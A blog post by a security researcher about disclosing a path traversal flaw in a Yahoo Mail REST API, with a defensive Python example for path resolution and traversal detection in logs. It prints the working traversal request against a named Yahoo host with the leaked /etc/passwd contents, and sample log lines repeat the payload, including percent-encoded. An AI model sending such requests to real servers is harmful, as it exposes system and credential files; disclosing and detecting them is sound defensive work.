Yahoo Japan suspects up to 22 million user IDs may have been leaked; does not include passwords #breaking
— Reuters Tech (@ReutersTech) May 17, 2013
This wouldn't happen if Yahoo had a Vulnerability Reward Program like Google, Facebook, Mozilla, Paypal, Etsy, etc. (list of reward programs @bugcrowd). Last year I discovered a LFI/Path Traversal vulnerability in a REST-API used by Yahoo Mail and I got an automated mail from their mailer. I refused to report more bugs to them because it's boring to talk with bots.
GET /v2/xframe/../../../../../../../etc/passwd?bc HTTP/1.1
Host: prod1.rest-notify.msg.yahoo.com

HTTP/1.1 200 OK
Connection: close
Expires: Thu, 15 Apr 2020 20:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 29676

root:*:0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:/bin/sh
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
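The request above escapes the web root because the server resolves ".." segments after mapping the URL onto the filesystem. The following is an added example (not Yahoo's code, and the web root, sample log lines and function names are my own assumptions) showing how a REST endpoint should resolve a request-target against its root and reject anything that escapes it, together with a simple access-log rule that flags traversal attempts, including percent-encoded ones.

```python
import posixpath
from typing import List, Optional
from urllib.parse import unquote, urlsplit

WEB_ROOT = "/srv/app/www"  # assumed document root for the example


def resolve_request_path(request_target: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Map an HTTP request-target onto a file below web_root.

    Returns the absolute path, or None when the request escapes web_root.
    The path is URL-decoded *before* normalisation so that %2e%2e/ cannot
    slip past the check. (Real code should also apply os.path.realpath to
    defeat symlinks inside the root; omitted here to keep the example offline.)
    """
    decoded = unquote(urlsplit(request_target).path)
    # Join first, normalise second: ".." segments then pop real directories
    # and the prefix check below catches any escape above web_root.
    candidate = posixpath.normpath(posixpath.join(web_root, decoded.lstrip("/")))
    if candidate != web_root and not candidate.startswith(web_root + "/"):
        return None
    return candidate


def looks_like_traversal(request_target: str) -> bool:
    """Detection rule: any '..' path segment after (double) URL-decoding."""
    decoded = unquote(unquote(urlsplit(request_target).path))
    return any(seg == ".." for seg in decoded.split("/"))


# Constructed access-log lines in a CLF-like shape; the second one mirrors the
# request quoted in the post, the third is the same idea percent-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/May/2013:10:00:01 +0000] "GET /v2/xframe/widget.html?bc HTTP/1.1" 200 512',
    '203.0.113.5 - - [17/May/2013:10:00:02 +0000] "GET /v2/xframe/../../../../../../../etc/passwd?bc HTTP/1.1" 200 29676',
    '198.51.100.9 - - [17/May/2013:10:00:03 +0000] "GET /v2/xframe/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 29676',
]


def flag_traversal_lines(lines: List[str]) -> List[str]:
    """Return the log lines whose request-target contains a traversal segment."""
    flagged = []
    for line in lines:
        try:
            target = line.split('"')[1].split(" ")[1]  # "METHOD target HTTP/x.y"
        except IndexError:
            continue  # malformed line, skip it
        if looks_like_traversal(target):
            flagged.append(line)
    return flagged
```

With the root-escape check in place the quoted request resolves to None and is refused, while the benign widget request maps to a file under the root; the log rule flags both the plain and the encoded traversal lines.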
Some minutes later I got an automated reply from Yahoo Security Contact:
Nils,

Thank you for contacting Yahoo!. These issues have been passed along to the correct teams to investigate. Should a fix be required, we will again contact you and ask that you see the issues as resolved.

Thanks again,
Yahoo! Security Contact

Days later the issue was fixed. But no more replies from them!
Yahoo, please start with a Vulnerability Reward Program and get in touch with the community - before it's too late.